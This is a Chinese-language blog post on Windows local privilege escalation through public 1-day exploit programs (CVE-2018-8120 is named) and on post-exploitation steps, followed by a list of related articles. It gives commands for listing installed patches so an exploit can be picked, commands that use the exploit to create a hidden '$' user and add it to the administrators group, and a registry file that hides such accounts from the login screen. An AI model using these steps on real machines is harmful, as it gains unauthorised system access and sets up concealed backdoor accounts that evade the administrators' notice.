Windows下的本地提权漏洞梳理及后渗透简析
1.github网址,截图,不同系统版本对应的漏洞
2.后渗透阶段
壹 通过1day漏洞进行Windows本地提权
分享一个github链接:Windows提权漏洞整理
里面大部分是基于x64系统的漏洞直接利用程序exe,傻瓜式操作,一键提权
C:\Users\Knownsec.zyg>
C:\Users\Knownsec.zyg>xxxx.exe "whoami"
C:\Users\Knownsec.zyg>粘一个大佬分享的截图:
提权前若是能够查看该系统的补丁那是更美妙的事情了:
C:\Users\Knownsec.zyg>systeminfoC:\Users\Knownsec.zyg>wmic qfe list full /format:htable >C:\Users\Knownsec.zyg\Desktop\hotfixes.htm这个命令会导出一个html,里面存放了每一个补丁安装的时间,由此可以推测该系统最后一个补丁的时间,查询1day提权漏洞
若是已经发现合适的漏洞并对其进行利用的话,成功效果图如下:
这便是利用CVE-2018-8120的x86版脚本直接提权,“whoami”后返回当前用户显示已经为“system”
贰 后渗透阶段
现在我们已经有了一个基于system超级用户的权限窗口,但是这个窗口功能过于单一,我们可控的权限仍然没有提升,可以通过这个窗口,进行下一步的提权后渗透:
思路:基于system的dos创建隐藏用户,将隐藏用户加入administrators用户组以获得管理员权限
C:\Users\Knownsec.zyg>xxxx.exe "net user" #查看当前所有用户
C:\Users\Knownsec.zyg>xxxx.exe "net user 用户名$ 密码 /add" #添加该用户
C:\Users\Knownsec.zyg>xxxx.exe "net localgroup administrastors username /add" #将该用户拉入管理员组以获得管理员权限
C:\Users\Knownsec.zyg>xxxx.exe "net user" #查看用户发现没有该隐藏用户或者再:
用记事本建个文本文件,输入以下内容(用户名自行修改),另存为.reg注册表文件后双击导入即可:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"隐藏用户名1"=dword:00000000
"隐藏用户名2"=dword:00000000
二合一食用效果更佳
Windows下的本地提权漏洞梳理及后渗透简析相关推荐
- 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞 (下)...
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...
- Microsoft Windows Win32k本地提权漏洞分析
漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-2546 漏洞类型:UAF 影响范围:Windows 7 Service P ...
- 【经典漏洞回顾】Microsoft Windows Win32k本地提权漏洞分析(CVE-2015-0057)
漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-0057 漏洞类型:UAF 影响范围:Windows Server 2003 ...
- 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞(上)...
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...
- 反编译exe软件_挖洞经验 | Panda反病毒软件本地提权漏洞分析
写在前面的话 在这篇文章中,我将跟大家讨论一个我在Panda反病毒产品中发现的一个安全漏洞(CVE-2019-12042),这是一个本地提权漏洞,该漏洞将允许攻击者在目标设备上将非特权账户提权至SYS ...
- win10注入漏洞跳出计算机,win10操作系统本地提权漏洞
2018年8月27日,安全研究人员在github上公布了最新的win10x64版的本地提权漏洞,并且在推特上对其提权的demo进行了演示.在github上的SandboxEscaper上有着完整的漏洞 ...
- CVE-2014-7911 Android本地提权漏洞分析与利用
概述 前面我们了解了Android Binder机制的基本原理,当然仅仅了解是不够的,我们要做到:Know it and hack it.这篇文章我们就来分析一个和Binder相关的漏洞:CVE-20 ...
- sqlite字段是否存在_【漏洞预警】Linux内核存在本地提权漏洞(CVE20198912)
更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn) 漏洞背景 近日,Linux git中发布一个commit补丁,该补丁对应的漏洞是一个本地 ...
- 开源OS FreeBSD 中 ftpd chroot 本地提权漏洞 (CVE-2020-7468) 的技术分析
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 7月份,一名匿名研究员向 ZDI 报告了 FreeBSD 中的一个本地提权漏洞.它位于 FreeBSD 的文件传输协议守护进程 (ft ...
最新文章
- 5分钟,看尽芯片和摩尔定律“你追我赶”的抗衡50年
- 【Linux系统编程】信号 (上)
- FutureTask 示例
- dynamic programming 学习
- 接口、抽象类、类之间的关系
- webstorm 添加php插件,webstorm常用插件分享
- spyder替换_Spyder 快捷键大全
- yii 下 session 丢失的问题
- Laravel5.1/Homestead (0.2.7) 开发环境的部署和设置
- 医院耗材管理系统开发_17
- 行政区划简称(包括别称)
- 如何使用工资短信生成器
- oracle数据库查询正在执行的sql,Oracle查询正在执行的SQL语句
- 关于让div元素垂直居中的几种方法
- 【CTF整理】电子取证之Easy_dump(18护网杯)
- android apk很大,从Android Studio生成的Apk文件太大
- C语言程序设计精髓 第14周——结构设计的艺术 练兵区——编程题
- 带你打开C语言的大门
- DoraCloud for Proxmox桌面云上启用NVIDIA Tesla P4的vGPU功能
- c语言游泳是怎么钓鱼的,不会游泳的钓友进来看 自制饵料钓鲤鱼